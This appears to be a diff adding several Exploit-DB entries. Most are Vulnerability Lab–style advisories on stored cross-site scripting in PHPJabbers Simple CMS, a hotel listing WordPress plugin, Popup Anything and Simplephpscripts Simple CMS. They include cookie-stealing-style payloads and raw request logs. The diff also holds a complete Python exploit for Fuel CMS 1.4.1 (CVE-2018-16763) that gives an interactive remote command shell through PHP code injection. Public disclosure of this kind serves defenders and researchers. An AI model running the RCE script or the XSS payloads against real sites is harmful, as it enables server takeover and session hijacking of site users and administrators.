+# Software Link: https://www.phpjabbers.com/simple-cms/
+# Version: v5
+# Tested on: Linux
+
+Document Title:
+===============
+PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2300
+
+
+Release Date:
+=============
+2021-10-28
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2300
+
+
+Common Vulnerability Scoring System:
+====================================
+5.4
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed
+to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections
+and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the
+Developer License and customize the script to fit your specific needs.
+
+(Copy of the Homepage:https://www.phpjabbers.com/simple-cms/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.
+
+
+Affected Product(s):
+====================
+PHPJabbers
+Product: PHPJabbers Simple CMS v5.0 - (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-01: Researcher Notification & Coordination (Security Researcher)
+2021-09-02: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-28: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in the in the PHPJabbers Simple CMS v5.0 web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) post method request.
+Privileged authenticated accounts with ui access are able to inject own malicious script code as name for users.
+The script code execution is performed after the inject via post method in the user list (pjAdminUsers).
+
+Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Create (Add)
+[+] Update
+
+Vulnerable Parameter(s):
+[+] pjActionCreate
+[+] pjActionUpdate
+
+Affected Module(s):
+[+] pjAdminUsers
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attackers with privilged user accounts with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payloads
+"><img src=evil.source onload=alert(document.cookie)>
+"><img src=evil.source onload=alert(document.domain)>
+
+
+--- PoC Session Logs (POST) [Add & Update]
+https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
+Host: phpjabbers-cms.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 178
+Origin:https://phpjabbers-cms.localhost:8080
+Connection: keep-alive
+Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
+Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
+_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
+pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
+user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
+-
+POST: HTTP/1.1 303
+Server: Apache/2.2.15 (CentOS)
+Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
+Keep-Alive: timeout=10, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+--
+https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
+Host: phpjabbers-cms.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 180
+Origin:https://phpjabbers-cms.localhost:8080
+Connection: keep-alive
+Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
+Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
+_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
+pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
+user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
+-
+POST: HTTP/1.1 303
+Server: Apache/2.2.15 (CentOS)
+Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
+Keep-Alive: timeout=10, max=83
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+-
+https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
+Host: phpjabbers-cms.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
+Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
+_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
+pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.2.15 (CentOS)
+Content-Length: 380
+Keep-Alive: timeout=10, max=89
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
+<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option>
+<option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1"
+class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3"
+class="pj-table-select-row"></td><td class="pj-table-cell-editable">
+<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
+<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text
+pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable">
+<span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;"
+class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td>
+<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable">
+<span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;"
+class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td>
+<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
+<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table>
+
+
+Reference(s):
+https://phpjabbers-cms.localhost:8080/
+https://phpjabbers-cms.localhost:8080/1630949262_438/
+https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
+https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
+https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/php/webapps/50476.txt b/exploits/php/webapps/50476.txt
new file mode 100644
index 000000000..4bb417db9
--- /dev/null
+++ b/exploits/php/webapps/50476.txt
@@ -0,0 +1,276 @@
+# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
+# Date: 2021-10-28
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://hotel.eplug-ins.com/
+# Software Link: https://hotel.eplug-ins.com/hoteldoc/
+# Version: v3
+# Tested on: Linux
+
+
+Document Title:
+===============
+Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2277
+
+
+Release Date:
+=============
+2021-10-28
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2277
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie.
+
+(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/  )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.
+
+
+Affected Product(s):
+====================
+e-plugins
+Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-08-19: Researcher Notification & Coordination (Security Researcher)
+2021-08-20: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-28: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module.
+Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to
+hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes
+place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts.
+The request method to inject is post and the attack vector is persistent located on the application-side.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Add New Listing
+
+
+Vulnerable Input(s):
+[+] address
+[+] city
+[+] zipcode
+[+] country
+
+Affected Module(s):
+[+] Frontend on Preview (All Listings)
+[+] Backend on Preview (All Listings) or Edit
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Exploitation: Payload
+%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E
+
+
+Vulnerable Source: new-listing
+<div class=" form-group row">
+<div class="col-md-6 ">
+<label for="text" class=" control-label col-md-4 ">Address</label>
+<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
+placeholder="Enter address Here">
+</div>
+<div class=" col-md-6">
+<label for="text" class=" control-label col-md-4">Area</label>
+<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
+placeholder="Enter Area Here">
+</div>
+</div>
+<div class=" form-group row">
+<div class="col-md-6 ">
+<label for="text" class=" control-label col-md-4">City</label>
+<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
+placeholder="Enter city ">
+</div>
+<div class=" col-md-6">
+<label for="text" class=" control-label col-md-4">Zipcode</label>
+<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
+placeholder="Enter Zipcode ">
+</div>
+</div>
+<div class=" form-group row">
+<div class=" col-md-6">
+<label for="text" class=" control-label col-md-4">State</label>
+<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
+placeholder="Enter State ">
+</div>
+<div class=" col-md-6">
+<label for="text" class=" control-label col-md-4">Country</label>
+<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
+placeholder="Enter Country ">
+</div>
+
+
+
+--- PoC Session Logs (POST) ---
+http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
+Host: hotel-eplug-ins.localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 1603
+Origin:http://hotel-eplug-ins.localhost:8000
+Connection: keep-alive
+Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
+-
+action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
+&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
+city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
+state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
+latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
+award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
+room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
+Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
+day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
+-
+POST: HTTP/1.1 200 OK
+Server: nginx/1.18.0
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
+Access-Control-Allow-Credentials: true
+Cache-Control: no-cache, must-revalidate, max-age=0
+X-Frame-Options: SAMEORIGIN
+Referrer-Policy: strict-origin-when-cross-origin
+Content-Encoding: gzip
+-
+http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
+Host: hotel-eplug-ins.localhost:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
+-
+GET: HTTP/1.1 200 OK
+Server: nginx/1.18.0
+Content-Type: text/html; charset=UTF-8
+Content-Length: 0
+Connection: keep-alive
+Cache-Control: no-cache, must-revalidate, max-age=0
+X-Redirect-By: WordPress
+Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post
+
+
+Solution - Fix & Patch:
+=======================
+1. Encode and parse all vulnerable input fields on transmit via post method request
+2. Restrict the input fields to disallow usage of special chars
+3. Encode and escape the output content in the edit and list itself to prevent the execution point
+
+
+Security Risk:
+==============
+The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/php/webapps/50477.py b/exploits/php/webapps/50477.py
new file mode 100755
index 000000000..4f2422dae
--- /dev/null
+++ b/exploits/php/webapps/50477.py
@@ -0,0 +1,63 @@
+# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
+# Exploit Author: Padsala Trushal
+# Date: 2021-11-03
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+#!/usr/bin/python3
+
+import requests
+from urllib.parse import quote
+import argparse
+import sys
+from colorama import Fore, Style
+
+def get_arguments():
+	parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
+
+	parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
+
+	parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
+
+	args = parser.parse_args()
+
+	if len(sys.argv) <=2:
+		parser.print_usage()
+		sys.exit()
+
+	return args
+
+
+args = get_arguments()
+url = args.url
+
+if "http" not in url:
+	sys.stderr.write("Enter vaild url")
+	sys.exit()
+
+try:
+   r = requests.get(url)
+   if r.status_code == 200:
+       print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
+
+
+except requests.ConnectionError:
+    print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
+    sys.exit()
+
+while True:
+	cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
+
+	main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
+
+	r = requests.get(main_url)
+
+	#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
+
+	output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
+	print(output[0])
+	if cmd == "exit":
+		break
\ No newline at end of file
diff --git a/exploits/php/webapps/50479.txt b/exploits/php/webapps/50479.txt
new file mode 100644
index 000000000..43ba733c5
--- /dev/null
+++ b/exploits/php/webapps/50479.txt
@@ -0,0 +1,44 @@
+# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 03/11/2021
+# Exploit Author: Luca Schembri
+# Vendor Homepage: https://www.essentialplugin.com/
+# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
+# Version: < 2.0.4
+
+** Summary **
+
+A user with a low privileged user can perform XSS-Stored attacks.
+
+
+** Plugin description **
+
+Popup Anything is the best popup builder and marketing plugin that
+helps you get more email subscribers, increase sales and grow your
+business.
+
+
+Manage powerful modal popup for your WordPress blog or website. You
+can add an unlimited popup with your configurations.
+
+
+** Vulnerable page **
+
+http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
+
+
+** PoC **
+
+Go on the "Popup Anything - Settings" tab and select "Simple Link" as
+"Link Type". Select "Link Test" and use this payload:
+
+test" onclick="alert(1)
+
+Save the popup and reload the page. Now click on "Link Text" and it
+will execute the javascript code
+
+The same attack can be exploited with "Button Text" and "Popup width" fields.
+
+
+** Remediation **
+
+Upgrade to 2.0.4 version or later
\ No newline at end of file
diff --git a/exploits/php/webapps/50482.txt b/exploits/php/webapps/50482.txt
new file mode 100644
index 000000000..cf141269b
--- /dev/null
+++ b/exploits/php/webapps/50482.txt
@@ -0,0 +1,246 @@
+# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 2021-10-19
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
+# Version: 2.1
+# Tested on: Linux
+
+Document Title:
+===============
+Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2302
+
+
+Release Date:
+=============
+2021-10-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2302
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+The system could be used only in already existing websites to control their page sections and contents.
+Just paste a single line of code on your web page section and start controlling it through the admin area.
+Very simple installation - one step installation wizard. Option to include contents into web page sections
+through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
+format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
+
+(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
+
+
+Affected Product(s):
+====================
+Simplephpscripts
+Product: Simple CMS v2.1 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-09-03: Researcher Notification & Coordination (Security Researcher)
+2021-09-04: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-10-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Full Authentication (Admin/Root Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent cross site web vulnerability is located in `name`, `username`, `password` parameters of the `newUser`
+or `editUser` modules. Remote attackers with privileged application user account and panel access are able to inject
+own malicious script code as credentials. The injected code executes on preview of the users list. The request method
+to inject is post and the attack vector is persistent.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] newUser
+[+] editUser
+
+Vulnerable File(s):
+[+] admin.php?act=users
+
+Vulnerable Input(s):
+[+] Name
+[+] Username
+[+] Password
+
+Vulnerable Parameter(s):
+[+] name
+[+] username
+[+] password
+
+Affected Module(s):
+[+] Users (act=users) (Backend)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by remote attackers with privileged account and with low user interaction.
+For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload
+"><img src='31337'onerror=alert(0)></img>
+
+
+Vulnerable Source: admin.php?act=users
+<tbody><tr>
+<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
+<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
+<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
+<td class="headlist" width="23%">Password</td>
+<td class="headlist" colspan="2">&nbsp;</td>
+</tr>
+<tr>
+<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
+<td class="bodylist">keymaster23@protonmail.com</td>
+<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
+<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
+<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
+<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');"
+title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
+</tr>
+
+
+--- PoC Session Logs (POST) [Create] ---
+https://simple-cms.localhost:8000/simplecms/admin.php
+Host: simple-cms.localhost:8000
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 141
+Origin: https://simple-cms.localhost:8000
+Connection: keep-alive
+Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
+Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
+act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de
+&username=d"><img src='31337'onerror=alert(0)></img>
+&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
+-
+POST: HTTP/2.0 200 OK
+server: Apache
+content-length: 5258
+content-type: text/html; charset=UTF-8
+-
+https://simple-cms.localhost:8000/simplecms/31337
+Host: simple-cms.localhost:8000
+Accept: image/webp,*/*
+Connection: keep-alive
+Referer: https://simple-cms.localhost:8000/simplecms/admin.php
+Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
+-
+GET: HTTP/2.0 200 OK
+server: Apache
